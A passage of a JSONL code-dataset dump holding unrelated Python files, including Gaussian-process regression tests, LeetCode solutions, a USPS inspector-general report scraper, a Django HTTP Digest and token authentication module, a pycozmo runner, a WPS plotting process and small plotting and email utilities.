RBF(d)\n m = GPRegressionModel(x, y, kern)\n \n m.checkgrad() \n \n ll1, ll2 = mg.log_likelihood(), m.log_likelihood()\n assert_array_almost_equal(ll1, ll2, decimal=3) \n \n m.fit()\n alpha_gpy = mg.posterior.woodbury_vector\n assert_array_almost_equal(alpha_gpy, m._alpha, decimal=3)\n \n yyh = m.predict(xx, compute_var='full')\n yyh_gpy = mg.predict(xx,full_cov=True)\n assert_array_almost_equal(yyh_gpy[0], yyh[0], decimal=3)\n assert_array_almost_equal(yyh_gpy[1], yyh[1], decimal=2)\n \n m.optimize()\n\n def test_gp_grief_model_some_active (self):\n d = 10\n adims = [0,2,4,6,7]\n\n # generate data\n np.random.seed(0)\n N = 100\n x = np.random.uniform(size=(N,d)) # generate dataset\n y = rastrigin((x*2-1)*5.12, lin_term=1.)\n xx = np.random.uniform(size=(N+1,d)) # generate test set\n\n # initialize GPy.models.GPRegression\n kern = GPy.kern.RBF(len(adims), active_dims=adims)\n with pytest.warns(UserWarning):\n mg = GPy.models.GPRegression(x, y, kern)\n # initialize gp_grief model\n kern = RBF(d, active_dims=adims)\n m = GPRegressionModel(x, y, kern)\n \n m.checkgrad() \n \n ll1, ll2 = mg.log_likelihood(), m.log_likelihood()\n assert_array_almost_equal(ll1, ll2, decimal=3) \n \n m.fit()\n alpha_gpy = mg.posterior.woodbury_vector\n assert_array_almost_equal(alpha_gpy, m._alpha, decimal=3)\n \n yyh = m.predict(xx, compute_var='full')\n yyh_gpy = mg.predict(xx,full_cov=True)\n assert_array_almost_equal(yyh_gpy[0], yyh[0], decimal=3)\n assert_array_almost_equal(yyh_gpy[1], yyh[1], decimal=2)\n \n m.optimize()\n\n def test_combining_kernels (self):\n # generate data\n np.random.seed(1)\n N = 100\n d = 5\n x = np.random.uniform(size=(N,d)) # generate dataset\n y = rastrigin((x*2-1)*5.12, lin_term=1.)\n xx = np.random.uniform(size=(N+1,d)) # generate test set\n \n def dd (i): \n l = 0.5*i+0.5\n return {'lengthscale':l, 'variance':l, 'name':'k%d'%i} \n # first define the base kernels\n kb_gpy = [GPy.kern.RBF(d, **dd(i)) for i in range(4)]\n kb_kml = [RBF( 
d, **dd(i)) for i in range(4)]\n\n # then combine the base kernels\n k_gpy = ((kb_gpy[0] * kb_gpy[1]) + kb_gpy[2]) * kb_gpy[3]\n k_kml = ((kb_kml[0] * kb_kml[1]) + kb_kml[2]) * kb_kml[3]\n assert_array_almost_equal( k_kml.cov(x), k_gpy.K(x) )\n\n # construct the models\n m = dict()\n m['gpy'] = GPy.models.GPRegression(x, y, k_gpy)\n m['kml'] = GPRegressionModel(x, y, k_kml)\n m['gpy'].mul.sum.mul.k1.variance.fix()\n m['gpy'].mul.k3.variance.fix()\n\n assert m['kml'].checkgrad()\n\n ll1, ll2 = m['gpy'].log_likelihood(), m['kml'].log_likelihood()\n assert_array_almost_equal(ll1, ll2, decimal=3) \n\n yyh = dict()\n yyh['gpy'] = m['gpy'].predict(xx, full_cov=True)\n yyh['kml'] = m['kml'].predict(xx, compute_var='full')\n assert_array_almost_equal(*[yyh[key][0] for key in m], decimal=2) \n assert_array_almost_equal(*[yyh[key][1] for key in m], decimal=2) \n\n wv1, wv2 = m['gpy'].posterior.woodbury_vector, m['kml']._alpha\n assert_array_almost_equal(wv1, wv2, decimal=3)\n\n with pytest.warns(RuntimeWarning):\n m['gpy'].optimize()\n m['kml'].optimize()\n ll1, ll2 = m['gpy'].log_likelihood(), m['kml'].log_likelihood()\n assert_array_almost_equal(ll1, ll2, decimal=-1) \n\nT = TestRegression()\nT.test_gp_grief_model_some_active()","sub_path":"tests/test_models/test_regression.py","file_name":"test_regression.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"409115638","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n# https://leetcode.com/discuss/16567/concise-solution-using-with-detailed-alogrithm-description\n\n\nclass Solution(object):\n\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if head is None or head.next is None:\n return None\n\n hare = turtle = entry = head\n\n while hare.next and hare.next.next:\n turtle = turtle.next\n hare = hare.next.next\n if turtle == hare:\n while turtle != entry:\n turtle = turtle.next\n entry = entry.next\n return entry\n return None\n","sub_path":"python/142 Linked List Cycle II.py","file_name":"142 Linked List Cycle II.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"349039167","text":"from scoping import scoping\n#scoping.settle(globals())\n\na = 2\nwith scoping():\n assert(2 == a)\n a = 3\n b = 'BB'\n scoping.keep('b')\n assert(3 == a)\nassert(2 == a)\nassert('BB' == b)\n","sub_path":"tests/small.py","file_name":"small.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"380075203","text":"from manimlib.imports import *\r\n\r\ndef debugTeX(self, texm):\r\n for i,j in enumerate(texm):\r\n tex_id = Integer(i).scale(0.3).set_color(RED)\r\n tex_id.move_to(j)\r\n self.add(tex_id)\r\n\r\ndef debugPoints(self, obj):\r\n for i,points in enumerate(obj.get_points()):\r\n point_id = Integer(i).scale(0.5).set_color(PURPLE_A)\r\n point_id.move_to(points)\r\n self.add(point_id)\r\n","sub_path":"Ag/MyCode/debugTexPoints.py","file_name":"debugTexPoints.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"328673655","text":"#!/usr/bin/env python\n\nfrom utils import utils, inspector\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport 
logging\n\n# oldest year: 1998\n#\n# options:\n# standard since/year options for a year range to fetch from.\n#\n# pages - number of pages to fetch. defaults to all of them (using a very high number)\n# begin - what page number to begin at. defaults to 1.\n# types - limit reports fetched to one or more types, comma-separated. e.g. \"audit,testimony\"\n# can include:\n# audit - Audit Reports\n# testimony - Congressional Testimony\n# press - Press Releases\n# research - Risk Analysis Research Papers\n# interactive - SARC (Interactive)\n# congress - Semiannual Report to Congress\n# defaults to\n# including audits, reports to Congress, and research\n# excluding press releases, SARC, and testimony to Congress\n\n# This will actually get adjusted downwards on the fly, so pick a huge number.\n# There are 164 pages total (page=163) as of 2014-07-27, so let's try, er, 1000.\nALL_PAGES = 1000\n\n\ndef run(options):\n year_range = inspector.year_range(options)\n pages = options.get('pages', ALL_PAGES)\n\n # default to starting at page 1\n begin = int(options.get('begin', 1))\n\n max_page = None\n for page in range(begin, (int(pages) + 1)):\n if max_page and (page > max_page):\n logging.debug(\"End of pages!\")\n break\n\n logging.debug(\"## Downloading page %i\" % page)\n url = url_for(options, page)\n body = utils.download(url)\n doc = BeautifulSoup(body)\n\n # When the USPS restores their page controls, we can use this again,\n # which saves one network call each time.\n max_page = last_page_for(doc)\n\n results = doc.select(\".views-row\")\n\n for result in results:\n report = report_from(result)\n\n # inefficient enforcement of --year arg, USPS doesn't support it server-side\n # TODO: change to published_on.year once it's a datetime\n if inspector.year_from(report) not in year_range:\n logging.warn(\"[%s] Skipping report, not in requested range.\" % report['report_id'])\n continue\n\n inspector.save_report(report)\n\n\n# extract fields from HTML, return dict\ndef report_from(result):\n report = {\n 'inspector': 'usps',\n 'inspector_url': 'https://uspsoig.gov/',\n 'agency': 'usps',\n 'agency_name': 'United States Postal Service'\n }\n\n pieces = result.select(\"span span\")\n report_type = type_for(pieces[0].text.strip())\n\n if len(pieces) == 3:\n timestamp = pieces[2].text.strip()\n report['%s_id' % report_type] = pieces[1].text.strip()\n elif len(pieces) == 2:\n timestamp = pieces[1].text.strip()\n\n published_on = datetime.strptime(timestamp, \"%m/%d/%Y\")\n\n report['type'] = report_type\n report['published_on'] = datetime.strftime(published_on, \"%Y-%m-%d\")\n\n # if there's only one button, use that URL\n # otherwise, look for \"Read Full Report\" (could be first or last)\n buttons = result.select(\"a.apbutton\")\n if len(buttons) > 1:\n link = None\n for button in buttons:\n if \"Full Report\" in button.text:\n link = button['href']\n elif len(buttons) == 1:\n link = buttons[0]['href']\n report['url'] = link\n\n # get filename, use name as report ID, extension for type\n filename = link.split(\"/\")[-1]\n extension = filename.split(\".\")[-1]\n report['report_id'] = filename.replace(\".\" + extension, \"\")\n\n report['title'] = result.select(\"h3\")[0].text.strip()\n\n return report\n\ndef type_for(original_type):\n original = original_type.lower()\n if \"audit\" in original:\n return \"audit\"\n elif \"testimony\" in original:\n return \"testimony\"\n elif \"press release\" in original:\n return \"press\"\n elif \"research\" in original:\n return \"research\"\n elif \"sarc\" in 
original:\n return \"interactive\"\n elif \"report to congress\" in original:\n return \"congress\"\n else:\n return None\n\n# get the last page number, from a page of search results\n# e.g. the last pager list item (markup stripped here), whose text reads \"of 158\":
  • \ndef last_page_for(doc):\n page = doc.select(\"li.pager-item.last\")[0].text.replace(\"of \", \"\").strip()\n if page and len(page) > 0:\n return int(page)\n\n # this means we're on the last page, AFAIK\n else:\n return -1\n\n\n# The USPS IG only supports a \"since\" filter.\n# So, if we get a --year, we'll use it as \"since\", and then\n# ignore reports after parsing their data (before saving them).\n# Inefficient, but more efficient than not supporting --year at all.\ndef url_for(options, page=1):\n year_range = inspector.year_range(options)\n\n url = \"https://uspsoig.gov/document-library?\"\n\n # there's always a first year, and it defaults to current year\n since = \"%s-01-01\" % year_range[0]\n url += \"&field_doc_date_value[value][date]=%s\" % since\n\n only = options.get('types')\n if not only:\n only = \"audit,congress,research\"\n only = only.split(\",\")\n params = [\"field_doc_cat_tid[]=%s\" % CATEGORIES[id] for id in only]\n url += \"&%s\" % str.join(\"&\", params)\n\n # they added this crazy thing\n annoying_prefix = \"0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C\"\n\n # page is 0-indexed\n if page > 1:\n url += \"&page=%s%i\" % (annoying_prefix, (page - 1))\n\n return url\n\n\nCATEGORIES = {\n 'audit': '1920',\n 'testimony': '1933',\n 'press': '1921',\n 'research': '1922',\n 'interactive': '3487',\n 'congress': '1923'\n}\n\n\nutils.run(run) if (__name__ == \"__main__\") else None\n","sub_path":"inspectors/usps.py","file_name":"usps.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"217111900","text":"# Given an array, return triplets that add up to the target sum\n# Idea: three pointers, let i = beggining of array, left = i + 1,\n# right = len(array) - 1, sum all three and find sum == target, if not\n# then increase left pointer if targetSum is greater, right pointer if \n# targetSum is less\n# O(n^2) time | O(n) space\ndef threeNumberSum(array, targetSum):\n # need this to be preformed on a sorted array\n array.sort()\n triplets = []\n # iterate through array - 2 b/c we are comparing 3 values\n for i in range(len(array) - 2):\n # Define left and right pointers\n left = i + 1\n right = len(array) - 1\n # Until array overlaps do this\n while left < right:\n # Calculate current sum from values of three pointers\n currentSum = array[i] + array[left] + array[right]\n # if triplets are a match append to output, array, update both pointers\n if currentSum == targetSum:\n triplets.append([array[i], array[left], array[right]])\n left += 1\n right -= 1\n # if our currentSum is more than target, increase only rright pointer and try again\n elif currentSum < targetSum:\n left += 1\n elif currentSum > targetSum:\n right -= 1\n return triplets\n","sub_path":"Python/array/three-sum.py","file_name":"three-sum.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"636190487","text":"from flask import Blueprint, render_template\nfrom webapp.services.workerListService import *\n\n\nworkerList = Blueprint('workerList', __name__)\n\n\n@workerList.route(\"/workers\", methods=[\"GET\"])\ndef list_worker():\n work_list_service = WorkListService()\n instances, cpu_charts, requests_charts = work_list_service.get_charts()\n instance, cpu_chart, request_chart = work_list_service.get_chart()\n\n return 
render_template(\"workerList.html\", charts=zip(instances, cpu_charts, requests_charts), manager_chart = zip(instance, cpu_chart, request_chart))\n","sub_path":"webapp/controllers/workerListController.py","file_name":"workerListController.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"508636660","text":"from typing import List\n\n\ndef tickets(lst: List[int]) -> str:\n \"\"\"\n The new \"Avengers\" movie has just been released!\n There are a lot of people at the cinema box office standing in a huge line.\n Each of them has a single 100, 50 or 25 dollars bill. An \"Avengers\" ticket costs 25 dollars.\n Vasya is currently working as a clerk. He wants to sell a ticket to every single person in this line.\n Can Vasya sell a ticket to each person and give the change if he initially has no money\n and sells the tickets strictly in the order people follow in the line?\n Return YES, if Vasya can sell a ticket to each person and give\n the change with the bills he has at hand at that moment.\n Otherwise return NO.\n\n :param lst: Array of \"user\" money\n :type lst: list\n :return str: YES or NO\n \"\"\"\n a, b = 0, 0\n\n for i in lst:\n if i == 25:\n a += 1\n elif i == 50:\n a -= 1\n b += 1\n elif i == 100:\n if b >= 1:\n a -= 1\n b -= 1\n else:\n a -= 3\n\n if (a < 0) or (b < 0):\n return \"NO\"\n\n return \"YES\"\n","sub_path":"src-python/vasya_clerk.py","file_name":"vasya_clerk.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"374288942","text":"import hashlib\nimport os\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.signing import Signer\nfrom django.utils import six\nfrom django.utils.six import text_type\n\nfrom digest import exceptions\nfrom digest.models import Token, DatabaseInterface\nfrom digest.utils import parse_dict_header\n\nHTTP_HEADER_ENCODING = 'iso-8859-1'\n\n\nUser = get_user_model()\n\n\ndef get_authorization_header(request):\n \"\"\"\n Return request's 'Authorization:' header, as a bytestring.\n Hide some test client ickyness where the header can be unicode.\n \"\"\"\n auth = request.META.get('HTTP_AUTHORIZATION', b'')\n if isinstance(auth, text_type):\n # Work around django test client oddness\n auth = auth.encode(HTTP_HEADER_ENCODING)\n return auth\n\n\nclass DigestAuthentication(object):\n \"\"\"\n HTTP Digest authentication against username/password.\n Compliant with RFC 2617 (http://tools.ietf.org/html/rfc2617).\n \"\"\"\n realm = 'django-rest-framework'\n hash_algorithms = {\n 'MD5': hashlib.md5,\n 'MD5-sess': hashlib.md5,\n 'SHA': hashlib.sha1}\n algorithm = 'MD5' # 'MD5'/'SHA'/'MD5-sess'\n # quality of protection\n qop = 'auth' # 'auth'/'auth-int'/None\n opaque = Signer().sign('DRFOPAQUE')\n\n def authenticate(self, request):\n if 'HTTP_AUTHORIZATION' in request.META:\n try:\n self.parse_authorization_header(\n request.META['HTTP_AUTHORIZATION']\n )\n except Exception:\n return None\n self.check_authorization_request_header()\n user = self.get_user()\n self.backend = DatabaseInterface(user)\n password = self.backend.get_password()\n if self.check_digest_auth(request, password):\n return user, None\n\n def authenticate_header(self, request):\n \"\"\"\n Builds the WWW-Authenticate response header\n \"\"\"\n nonce_data = '%s:%s' % (self.realm, os.urandom(8))\n nonce = self.hash_func(nonce_data)\n\n header_format = 'Digest realm=\"%(realm)s\", 
qop=\"%(qop)s\",' \\\n ' nonce=\"%(nonce)s\", opaque=\"%(opaque)s\",' \\\n ' algorithm=\"%(algorithm)s\"'\n header_values = {\n 'realm': self.realm,\n 'qop': self.qop,\n 'algorithm': self.algorithm,\n 'opaque': self.opaque,\n 'nonce': nonce}\n header = header_format % header_values\n return header\n\n def parse_authorization_header(self, auth_header):\n if not auth_header.startswith('Digest '):\n raise exceptions.BadHeaderException(\n 'Header do not start with Digest'\n )\n auth_header = auth_header.replace('Digest ', '')\n self.auth_header = parse_dict_header(auth_header)\n\n def check_authorization_request_header(self):\n \"\"\"\n The values of the opaque and algorithm fields must be those supplied\n in the WWW-Authenticate response header\n \"\"\"\n required_fields = ('username', 'realm', 'nonce', 'uri',\n 'response', 'algorithm', 'opaque')\n\n for field in required_fields:\n if field not in self.auth_header:\n raise Exception(\n 'Required field %s not found' % field)\n\n for field in ('opaque', 'algorithm', 'realm', 'qop'):\n if not self.auth_header[field] == getattr(self, field):\n raise Exception('%s provided not valid' % field)\n\n qop = self.auth_header.get('qop')\n if qop in ('auth', 'auth-int'):\n for c in ('nc', 'cnonce'):\n if c not in self.auth_header:\n raise Exception('%s is required' % c)\n if not qop:\n for c in ('nc', 'cnonce'):\n if c in self.auth_header:\n raise Exception('%s provided without qop' % c)\n\n def get_user(self):\n username = self.auth_header['username']\n try:\n username_field = 'username'\n if hasattr(User, 'USERNAME_FIELD'):\n username_field = User.USERNAME_FIELD\n args = {username_field: username}\n user = User.objects.get(**args)\n except (User.DoesNotExist, User.MultipleObjectsReturned):\n raise Exception\n return user\n\n def check_digest_auth(self, request, password):\n \"\"\"\n Check user authentication using HTTP Digest auth\n \"\"\"\n last_counter = self.backend.get_counter(\n self.auth_header['nonce'],\n self.auth_header['cnonce'],\n )\n current_counter = int(self.auth_header['nc'], 16)\n if last_counter is not None and not last_counter < current_counter:\n raise exceptions.UnauthorizedException\n else:\n self.backend.set_counter(\n self.auth_header['nonce'],\n self.auth_header['cnonce'],\n current_counter\n )\n\n response_hash = self.generate_response(request, password)\n return response_hash == self.auth_header['response']\n\n def generate_response(self, request, password):\n \"\"\"\n Compile digest auth response\n\n If the qop directive's value is \"auth\" or \"auth-int\":\n RESPONSE = HASH(HA1:nonce:nc:cnonce:qop:HA2)\n If the \"qop\" directive is not present:\n (this construction is for compatibility with RFC 2069)\n RESPONSE = MD5(HA1:nonce:HA2)\n \"\"\"\n HA1_value = self.create_HA1(password)\n HA2_value = self.create_HA2(request)\n\n if self.auth_header.get('qop') is None:\n response_data = ':'.join((\n HA1_value,\n self.auth_header['nonce'],\n HA2_value))\n response = self.hash_func(response_data)\n else:\n # qop is 'auth' or 'auth-int'\n response_data = \":\".join((HA1_value,\n self.auth_header['nonce'],\n self.auth_header['nc'],\n self.auth_header['cnonce'],\n self.auth_header['qop'],\n HA2_value))\n response = self.hash_func(response_data)\n return response\n\n def create_HA1(self, password):\n \"\"\"\n Create HA1 hash\n\n HA1 = HASH(A1) = HASH(username:realm:password)\n \"\"\"\n if self.algorithm == 'MD5-sess':\n data = ':'.join((\n self.auth_header['username'],\n self.realm,\n password))\n data_hash = self.hash_func(data)\n A1 = 
':'.join((\n data_hash,\n self.auth_header['nonce'],\n self.auth_header['cnonce']))\n else:\n A1 = ':'.join((\n self.auth_header['username'],\n self.realm,\n password))\n return self.hash_func(A1)\n\n def create_HA2(self, request):\n \"\"\"\n Create HA2 hash\n\n If the \"qop\" directive's value is \"auth\" or is unspecified,\n then HA2 is:\n HA2 = HASH(A2) = HASH(request-method:digest-URI)\n If the qop directive's value is \"auth-int\", then HA2 is\n HA2 = HASH(A2) = HASH(request-method:digest-URI:MD5(entityBody))\n \"\"\"\n\n if self.auth_header.get('qop') in ('auth', None):\n A2 = ':'.join((request.method, self.auth_header['uri']))\n return self.hash_func(A2)\n elif self.auth_header.get('qop') == 'auth-int':\n body_hash = self.hash_func(request.body)\n A2 = ':'.join((request.method,\n self.auth_header['uri'],\n body_hash))\n return self.hash_func(A2)\n\n def hash_func(self, data):\n alg_hash_func = self.hash_algorithms[self.algorithm]\n return alg_hash_func(six.b(data)).hexdigest()\n\n\nclass TokenAuthentication(object):\n \"\"\"\n Simple token based authentication.\n Clients should authenticate by passing the token key in the \"Authorization\"\n HTTP header, prepended with the string \"Token \". For example:\n Authorization: Token 401f7ac837da42b97f613d789819ff93537bee6a\n \"\"\"\n\n keyword = 'Token'\n model = Token\n\n def __init__(self, user, token):\n self.user = user\n self.token = token\n\n def get_model(self):\n return self.model\n\n def authenticate(self, request):\n auth = get_authorization_header(request).split()\n\n if not auth or auth[0].lower() != self.keyword.lower().encode():\n return None\n\n if len(auth) == 1:\n msg = 'Invalid token header. No credentials provided.'\n raise Exception(msg)\n elif len(auth) > 2:\n msg = '''Invalid token header. Token string\n should not contain spaces.'''\n raise Exception(msg)\n\n try:\n token = auth[1].decode()\n except UnicodeError:\n msg = '''Invalid token header. Token string should \n not contain invalid characters.'''\n raise Exception(msg)\n\n return self.authenticate_credentials(token)\n\n def authenticate_credentials(self, key):\n model = self.get_model()\n try:\n token = model.objects.select_related('user').get(key=key)\n except model.DoesNotExist:\n raise Exception('Invalid token.')\n\n if not token.user.is_active:\n raise Exception('User inactive or deleted.')\n\n return (token.user, token)\n\n def authenticate_header(self, request):\n return self.keyword\n","sub_path":"digest/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":9682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"249046281","text":"\nfrom typing import Optional\nimport sys\nimport os\nimport logging\n\nfrom . import logger, logger_protocol\nfrom . 
import client\n\n\n__all__ = [\n 'setup_basic_logging',\n 'run_program',\n]\n\n\ndef setup_basic_logging(log_level: Optional[str] = None, protocol_log_level: Optional[str] = None,\n target=sys.stderr) -> None:\n if log_level is None:\n log_level = os.environ.get('PYCOZMO_LOG_LEVEL', logging.INFO)\n if protocol_log_level is None:\n protocol_log_level = os.environ.get('PYCOZMO_PROTOCOL_LOG_LEVEL', logging.WARNING)\n handler = logging.StreamHandler(stream=target)\n formatter = logging.Formatter(\n fmt=\"%(asctime)s.%(msecs)03d %(name)-20s %(levelname)-8s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(log_level)\n logger_protocol.addHandler(handler)\n logger_protocol.setLevel(protocol_log_level)\n\n\ndef run_program(f: callable, log_level: Optional[str] = None, protocol_log_level: Optional[str] = None,\n protocol_log_messages: Optional[list] = None) -> None:\n setup_basic_logging(log_level=log_level, protocol_log_level=protocol_log_level)\n\n cli = client.Client(protocol_log_messages=protocol_log_messages)\n cli.start()\n cli.connect()\n cli.wait_for_robot()\n\n try:\n f(cli)\n except KeyboardInterrupt:\n logger.info(\"Interrupted...\")\n finally:\n cli.disconnect()\n cli.stop()\n\n logger.info(\"Done.\")\n","sub_path":"pycozmo/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"629216975","text":"from flyingpigeon import visualisation as vs\nfrom pywps.Process import WPSProcess\n\nfrom flyingpigeon.log import init_process_logger\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass plottimeseriesProcess(WPSProcess):\n def __init__(self):\n # definition of this process\n WPSProcess.__init__(\n self,\n identifier=\"plot_timeseries\",\n title=\"Plots -- timeseries\",\n version=\"0.9\",\n metadata=[\n {\"title\": 'Plots timeseries'}\n ],\n abstract=\"Outputs some timeseries of the file field means. 
Spaghetti and uncertainty plot\",\n statusSupported=True,\n storeSupported=True\n )\n\n self.resource = self.addComplexInput(\n identifier=\"resource\",\n title=\"NetCDF Files\",\n abstract=\"NetCDF Files\",\n minOccurs=1,\n maxOccurs=100,\n maxmegabites=5000,\n formats=[{\"mimeType\": \"application/x-netcdf\"}],\n )\n\n self.variableIn = self.addLiteralInput(\n identifier=\"variable\",\n title=\"Variable\",\n abstract=\"Variable to be expected in the input files (variable will be detected if not set)\",\n default=None,\n type=type(''),\n minOccurs=0,\n maxOccurs=1,\n )\n\n self.plotout_spagetti = self.addComplexOutput(\n identifier=\"plotout_spagetti\",\n title=\"Visualisation, Spaghetti plot\",\n abstract=\"Visualisation of single variables as a spaghetti plot\",\n formats=[{\"mimeType\": \"image/png\"}],\n asReference=True,\n )\n\n self.plotout_uncertainty = self.addComplexOutput(\n identifier=\"plotout_uncertainty\",\n title=\"Visualisation, Uncertainty plot\",\n abstract=\"Visualisation of single variables ensemble mean with uncertainty\",\n formats=[{\"mimeType\": \"image/png\"}],\n asReference=True,\n )\n\n self.output_log = self.addComplexOutput(\n identifier=\"output_log\",\n title=\"Logging information\",\n abstract=\"Collected logs during process run.\",\n formats=[{\"mimeType\": \"text/plain\"}],\n asReference=True,\n )\n\n def execute(self):\n\n init_process_logger('log.txt')\n self.output_log.setValue('log.txt')\n from flyingpigeon.utils import archiveextract\n\n ncfiles = archiveextract(self.getInputValues(identifier='resource'))\n var = self.variableIn.getValue()\n\n if var is None:\n from flyingpigeon.utils import get_variable\n var = get_variable(ncfiles[0])\n\n self.status.set('plotting variable %s' % var, 10)\n\n try:\n plotout_spagetti_file = vs.spaghetti(\n ncfiles,\n variable=var,\n title='Fieldmean of %s ' % (var),\n dir_out=None\n )\n logger.info(\"spagetti plot done\")\n self.status.set('Spagetti plot for %s %s files done' % (len(ncfiles), var), 50)\n except:\n logger.exception(\"spagetti plot failed\")\n\n try:\n plotout_uncertainty_file = vs.uncertainty(\n ncfiles,\n variable=var,\n title='Ensemble uncertainty for %s ' % (var),\n dir_out=None\n )\n\n self.status.set('Uncertainty plot for %s %s files done' % (len(ncfiles), var), 90)\n logger.info(\"uncertainty plot done\")\n except:\n logger.exception(\"uncertainty plot failed\")\n\n self.plotout_spagetti.setValue(plotout_spagetti_file)\n self.plotout_uncertainty.setValue(plotout_uncertainty_file)\n self.status.set('visualisation done', 100)\n","sub_path":"flyingpigeon/processes/wps_plot_timeseries.py","file_name":"wps_plot_timeseries.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"534945294","text":"import matplotlib as mpl\nimport numpy as np\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\nsns.set()\n\nfile_name = 'nohup.out'\n\nwith open(file_name) as f:\n content = f.readlines()\n f.close()\n\ndata = []\nfor row in content:\n if(row.split('/')[0].isdigit()):\n data.append(row)\n\n if('loss:' in row):\n data.append(row)\n\n\nepochs = []\ntrain_loss = []\nvalidation_loss = []\ntrain_loss_val = []\ncurr_t_loss = 0\nfor d in data:\n row = d.split(' ')\n \n if('loss:' in d):\n val_loss = d.split(':')[1].strip()\n validation_loss.append(float(val_loss))\n train_loss_val.append(curr_t_loss)\n continue\n\n\n if(len(row) < 5):\n continue\n \n epoch = int(row[0].split('/')[0])\n tloss = 
float(row[3].split('=')[1])\n curr_t_loss = tloss\n epochs.append(int(epoch))\n train_loss.append(float(tloss))\n\nfig, (ax1, ax2) = plt.subplots(1,2)\nfig.suptitle('Training loss')\n\nax1.plot(epochs, train_loss)\nax1.set_title('Training loss')\nax1.set_ylabel('Loss')\nax1.set_xlabel('Epochs')\n\nax2.plot(np.arange(len(validation_loss)), validation_loss, label='validation')\nax2.plot(np.arange(len(validation_loss)), train_loss_val, label='train')\nax2.set_title('Validation vs Training loss')\nax2.set_ylabel('Loss')\nax2.set_xlabel('# validation, every 1000 epoch')\nax2.legend()\n\n#plt.xlabel('Epochs')\n#plt.ylabel('Loss')\n\nfig.savefig('loss_plotv2')\n","sub_path":"loss_graph.py","file_name":"loss_graph.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"411979123","text":"#!/usr/bin/env python\n# Import smtplib for the actual sending function\nimport smtplib\n\ndef sendEmail(theSubject, theTo, theFrom=\"av-mail-sender@stanford.edu\", theContents=\"\"):\n from email.mime.text import MIMEText\n msg = MIMEText(theContents)\n\n msg['Subject'] = theSubject\n msg['From'] = theFrom\n msg['To'] = \",\".join(theTo)\n\n s = smtplib.SMTP('smtp.stanford.edu')\n s.starttls();\n s.sendmail(theFrom, theTo, msg.as_string())\n s.quit()\n\nif __name__ == \"__main__\":\n import argparse;\n parser = argparse.ArgumentParser(\"Script for email sending\");\n parser.add_argument(\"--to\", nargs=\"+\",required=True);\n parser.add_argument(\"--sender\",default=\"av-mail-sender@stanford.edu\");\n parser.add_argument(\"--subject\",required=True);\n parser.add_argument(\"--contents\", default=\"\");\n options = parser.parse_args();\n sendEmail(options.subject, options.to, options.sender, options.contents);\n\n\n","sub_path":"util/sendEmail.py","file_name":"sendEmail.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"82172013","text":"\n\nfrom xai.brain.wordbase.verbs._denigrate import _DENIGRATE\n\n#calss header\nclass _DENIGRATES(_DENIGRATE, ):\n\tdef __init__(self,): \n\t\t_DENIGRATE.__init__(self)\n\t\tself.name = \"DENIGRATES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"denigrate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_denigrates.py","file_name":"_denigrates.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"323331215","text":"from __future__ import print_function\nimport sys\n\n# -----------------------------------------------------------------------------\n# Filter : Module\n# -----------------------------------------------------------------------------\n# list of module name (NOT class name)\nLOG_ENABLED_MODULES = [\n #\"aobjs\",\n #\"aobjs.deco\",\n #\"aobjs.deco.aodeco\",\n #\"aobjs.deco.underline\",\n #\"aobjs.aobj\",\n #\"aobjs.atext\",\n #\"core\",\n \"core.aomgr\",\n #\"debug\",\n #\"debug.log\",\n #\"geo\",\n #\"geo.coordmath\",\n #\"geo.coordmath.point\",\n #\"geo.coordmath.rect\",\n #\"geo.coordmath.size\",\n #\"gui\",\n #\"gui.adc\",\n #\"gui.dgrmctrl\",\n #\"gui.frame\",\n #\"gui.setting\",\n #\"gui.tool\",\n #\"gui.toolselect\",\n #\"gui.tooltext\",\n 